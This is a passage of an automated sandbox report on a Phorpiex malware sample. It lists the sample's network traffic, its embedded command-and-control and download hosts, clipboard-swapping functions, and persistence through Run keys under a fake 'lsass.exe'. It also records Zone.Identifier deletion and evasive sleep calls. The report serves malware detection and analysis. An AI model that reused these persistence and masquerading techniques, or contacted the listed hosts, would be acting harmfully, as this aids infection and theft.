a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:40 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://%s:%hu/tor/server/fp/%s.z
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://%s:%hu/tor/server/fp/%s.zrouter
            Source: lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://%s:%hu/tor/status-vote/current/consensus.z
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://%s:%hu/tor/status-vote/current/consensus.zdirectory-footer
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://%sHTTP/1.0
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://%sMozilla/5.0
            Source: lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://127.0.0.1:%hu
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://127.0.0.1:%humsvcrt.dllsscanf_s_beginthreadexSecur32.dllInitSecurityInterfaceA200
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://185.215.113.93/
            Source: lsass.exe, 00000008.00000002.2589096829.00000000004FA000.00000004.00000010.00020000.00000000.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
            Source: 6K1uYM85lS.exe, 00000000.00000002.2254661523.00000000012FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://7fv5nq57k4qvbrpt.onion/C:
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://7fv5nq57k4qvbrpt.onion/http://185.215.113.93/http://feedmefile.top/http://gotsomefile.top/htt
            Source: lsass.exe, 00000005.00000002.2426687670.0000000001424000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509379686.000000000145C000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509309205.0000000001434000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509290088.0000000001412000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000000.2450597790.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000002.2509099309.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589351852.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589394386.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589257665.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589510100.0000000000A60000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.2532345540.0000000000785000.00000002.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://api.wipmania.com/
            Source: 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.wipmania.com/-
            Source: 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.wipmania.com/E
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://api.wipmania.com/UAMozilla/5.0
            Source: lsass.exe, 00000008.00000002.2589351852.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.wipmania.com/s
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://feedmefile.top/
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://gimmefile.top/
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://gotsomefile.top/
            Source: lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://www.48838389493.jo/
            Source: 6K1uYM85lS.exe, lsass.exe.0.drString found in binary or memory: http://www.48838389493.jo/f5d4s54s4sds5d5d5d3r3hr8h38h8h38f8hffw4tw84thw4h8th8w4h8t3rvr3r3bru3urbu3r
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009AFCD0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,Sleep,0_2_009AFCD0
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009AF010 wcslen,iswalpha,iswdigit,lstrlenW,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009AF010
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009AF660 strlen,isalpha,isdigit,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009AF660
            Source: C:\180771693628709\lsass.exeCode function: 5_2_0077F660 strlen,isalpha,isdigit,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0077F660
            Source: C:\180771693628709\lsass.exeCode function: 5_2_0077F010 wcslen,iswalpha,iswdigit,lstrlenW,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0077F010
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009AFCD0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,Sleep,0_2_009AFCD0

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Source: Yara matchFile source: Process Memory Space: 6K1uYM85lS.exe PID: 3200, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 4596, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 5308, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 2884, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 3320, type: MEMORYSTR
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2C90 memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,0_2_009A2C90
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2680 memmove,CryptImportKey,CryptSetKeyParam,memmove,CryptDestroyKey,0_2_009A2680
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2420 CryptImportKey,CryptGetKeyParam,CryptDestroyKey,0_2_009A2420
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009AFE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,0_2_009AFE60
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009AFD80 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,0_2_009AFD80
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2B60 memmove,memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,0_2_009A2B60
            Source: C:\180771693628709\lsass.exeCode function: 5_2_0077FE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,5_2_0077FE60
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772420 CryptImportKey,CryptGetKeyParam,CryptDestroyKey,5_2_00772420
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772C90 memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,5_2_00772C90
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772680 memmove,CryptImportKey,CryptSetKeyParam,memmove,CryptDestroyKey,5_2_00772680
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772B60 memmove,memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,5_2_00772B60
            Source: C:\180771693628709\lsass.exeCode function: 5_2_0077FD80 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,5_2_0077FD80

            System Summary

            barindex
            Source: 6K1uYM85lS.exe, type: SAMPLEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: 0.2.6K1uYM85lS.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: 6.2.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: 8.0.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: 0.0.6K1uYM85lS.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: 5.2.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: 8.2.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: 5.0.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: 6.0.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: 3.0.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: C:\180771693628709\lsass.exe, type: DROPPEDMatched rule: Detects Phorpiex variants Author: ditekSHen
            Source: C:\180771693628709\lsass.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A78000_2_009A7800
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007778005_2_00777800
            Source: C:\180771693628709\lsass.exeCode function: String function: 00772100 appears 63 times
            Source: C:\180771693628709\lsass.exeCode function: String function: 00779030 appears 38 times
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: String function: 009A9030 appears 38 times
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: String function: 009A2100 appears 63 times
            Source: 6K1uYM85lS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 6K1uYM85lS.exe, type: SAMPLEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: 0.2.6K1uYM85lS.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: 6.2.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: 8.0.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: 0.0.6K1uYM85lS.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: 5.2.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: 8.2.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: 5.0.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: 6.0.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: 3.0.lsass.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: C:\180771693628709\lsass.exe, type: DROPPEDMatched rule: MALWARE_Win_Phorpiex author = ditekSHen, description = Detects Phorpiex variants
            Source: classification engineClassification label: mal100.troj.evad.winEXE@6/1@13/19
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009B0930 CoCreateInstance,0_2_009B0930
            Source: C:\180771693628709\lsass.exeMutant created: \Sessions\1\BaseNamedObjects\433u3t
            Source: 6K1uYM85lS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 6K1uYM85lS.exeReversingLabs: Detection: 72%
            Source: 6K1uYM85lS.exeVirustotal: Detection: 70%
            Source: 6K1uYM85lS.exeString found in binary or memory: ip-address
            Source: lsass.exeString found in binary or memory: ip-address
            Source: 6K1uYM85lS.exeString found in binary or memory: ip-address
            Source: 6K1uYM85lS.exeString found in binary or memory: -----END MESSAGE-----introduction-point ip-address onion-port onion-key
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeFile read: C:\Users\user\Desktop\6K1uYM85lS.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\6K1uYM85lS.exe C:\Users\user\Desktop\6K1uYM85lS.exe
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeProcess created: C:\180771693628709\lsass.exe C:\180771693628709\lsass.exe
            Source: unknownProcess created: C:\180771693628709\lsass.exe "C:\180771693628709\lsass.exe"
            Source: unknownProcess created: C:\180771693628709\lsass.exe "C:\180771693628709\lsass.exe"
            Source: unknownProcess created: C:\180771693628709\lsass.exe "C:\180771693628709\lsass.exe"
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeProcess created: C:\180771693628709\lsass.exe C:\180771693628709\lsass.exeJump to behavior
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: 6K1uYM85lS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: 6K1uYM85lS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A9030 LoadLibraryA,GetProcAddress,0_2_009A9030
            Source: lsass.exe.0.drStatic PE information: real checksum: 0x28391 should be: 0x1e40e
            Source: 6K1uYM85lS.exeStatic PE information: real checksum: 0x28391 should be: 0x1e40e
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009B41C0 push eax; ret 0_2_009B41EE
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007841C0 push eax; ret 5_2_007841EE

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeFile created: C:\180771693628709\lsass.exeJump to dropped file
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeFile created: C:\180771693628709\lsass.exeJump to dropped file
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Host Process for Windows ServicesJump to behavior
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Host Process for Windows ServicesJump to behavior
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Host Process for Windows ServicesJump to behavior
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Host Process for Windows ServicesJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeFile opened: C:\Users\user\Desktop\6K1uYM85lS.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\180771693628709\lsass.exeFile opened: C:\180771693628709\lsass.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 9030
            Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49757

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-6169
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-6169
            Source: C:\180771693628709\lsass.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-6169
            Source: C:\180771693628709\lsass.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-6169
            Source: C:\180771693628709\lsass.exeWindow / User API: threadDelayed 1349Jump to behavior
            Source: C:\180771693628709\lsass.exeWindow / User API: threadDelayed 7955Jump to behavior
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeEvaded block: after key decisiongraph_0-6246
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeEvaded block: after key decisiongraph_0-6221
            Source: C:\180771693628709\lsass.exeEvaded block: after key decisiongraph_5-6169
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-6397
            Source: C:\180771693628709\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-6391
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeAPI coverage: 7.6 %
            Source: C:\180771693628709\lsass.exeAPI coverage: 2.3 %
            Source: C:\180771693628709\lsass.exe TID: 5388Thread sleep count: 258 > 30Jump to behavior
            Source: C:\180771693628709\lsass.exe TID: 5388Thread sleep time: -51600s >= -30000sJump to behavior
            Source: C:\180771693628709\lsass.exe TID: 5224Thread sleep count: 1349 > 30Jump to behavior
            Source: C:\180771693628709\lsass.exe TID: 5224Thread sleep time: -2698000s >= -30000sJump to behavior
            Source: C:\180771693628709\lsass.exe TID: 5224Thread sleep count: 7955 > 30Jump to behavior
            Source: C:\180771693628709\lsass.exe TID: 5224Thread sleep time: -15910000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009B09F0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_009B09F0
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009B0B30 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_009B0B30
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00780B30 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00780B30
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007809F0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_007809F0
            Source: lsass.exe, 00000006.00000002.2509417982.000000000147D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD L2CAP [Bluetooth]Hyper-V RAWRSVP UDPv6 Service Provider
